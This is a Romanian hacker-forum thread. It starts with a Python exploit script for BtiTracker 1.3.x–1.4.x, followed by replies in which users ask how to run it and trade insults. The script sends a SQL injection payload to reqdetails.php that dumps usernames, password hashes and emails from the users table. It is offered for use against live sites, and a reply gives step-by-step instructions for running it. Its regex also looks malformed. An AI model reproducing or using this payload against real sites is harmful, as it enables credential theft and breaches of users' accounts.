BtiTracker 1.3.x – 1.4.x Exploit [Python]

[Guest .TinKode.]

#!/usr/bin/env python# 
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  

import sys, urllib2, re

if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit  ==============="
    print "==============================================================="
    print "=               Discovered and coded by  TinKode               ="     
    print "=                      www.InSecurity.ro                       ="
    print "=                                                              ="
    print "= Local  Command:                                              ="
    print "= ./isr.py [http://webshit]  [ID]                              ="
    print "=                                                              ="
    print "==============================================================="
    exit()

if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]

shit  = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"

url  = shit  + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) +  "--"
print "\n"
print "============================================="
print "=================  InSecurity ================"
print "============================================="

html  = urllib2.urlopen(url).read()
slobod =  re.findall(r"--(.*)\[0-9a-fA-F]{32})\.*)--", html)
if  len(slobod)  > 0:
    print "ID       : "  + str(id)
    print "Username : " +  slobod[0][0]
    print "Password : " +  slobod[0][1]
    print "EMail    : " +  slobod[0][2] 
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "Ai luat-o la gaoaza..."

#InSecurity.ro - Romania

Source: BtiTracker 1.3.X - 1.4.X Exploit

[alexalghisi]

si ... ce face ?

[CyberWolf08]

E un exploit pentru siteuri care folosesc BtiTracker. Extrage conturile inregistrate pe site daca nu ma insel.

@TinKode : Borned???? WTF, vezi semnatura... Unde n-ai invatat engleza?

[alexalghisi]

si parola ?

L.E: am observat ca si parola si emailul .. functioneaza oare pe orice tracker ? chiar si pe filelist? :O

Edited June 10, 2010 by alexalghisi

[begood]

bravo tinky !

[strike]

si parola ?

L.E: am observat ca si parola si emailul .. functioneaza oare pe orice tracker ? chiar si pe filelist? :O

Merge doar pe trackerele care folosesc BtiTracker.Filelist nu e unul dintre ele:)

[Alynutza]

Cum se foloseste?

Am downloadat si e o chestie cu extensia .py

[Flubber]

Cum se foloseste?

Am downloadat si e o chestie cu extensia .py

Ti-o bagi in pizda!

[Alynutza]

Ti-o bagi in pizda!

M? da nesimtit mai esti:|

Bine ca ai luat ban

PS:Ma ajuta si pe mine cineva(pe mess) cu programele astea?

[Nytro]

Descarca asta: http://downloads.activestate.com/ActivePython/releases/2.6.5.12/ActivePython-2.6.5.12-win32-x86.msi

Intrii in cmd, mergi in directorul in care ai instalat python folosind "cd", copiezi in acel directorul exploitul, pui extensia ".py", apoi rulezi "python exploit.py". Parca asa era cu Active Python.

Pff, dar mai bine lasa, mai intai sa prinzi notiunile de baza, apoi treci la folosirea exploiturilor. Oricum sunt tutoriale despre cum sa faci asta.

[Alynutza]

Nytro nu am inteles mai nimic din ce ai zis:D Dar oricum...acuma trebuie sa invat notiuunile de baza

[Flubber]

Nytro nu am inteles mai nimic din ce ai zis:D Dar oricum...acuma trebuie sa invat notiuunile de baza

Cum de te-ai prins? Era greu sa cauti pe google ".py extension" sa vezi ca se refera la extensia care o foloseste limbajul de programare Python? Dupa care cautai "Python Programming Language" si invatai limbajul de programare sau aruncai un ochi peste.

Data viitoare foloseste Google si nu mai pune intrebari stupide! Foloseste-ti creierul.

Si stai linistit(a), am revenit.

[strike]

@Flubber si eu care ma bucuram:))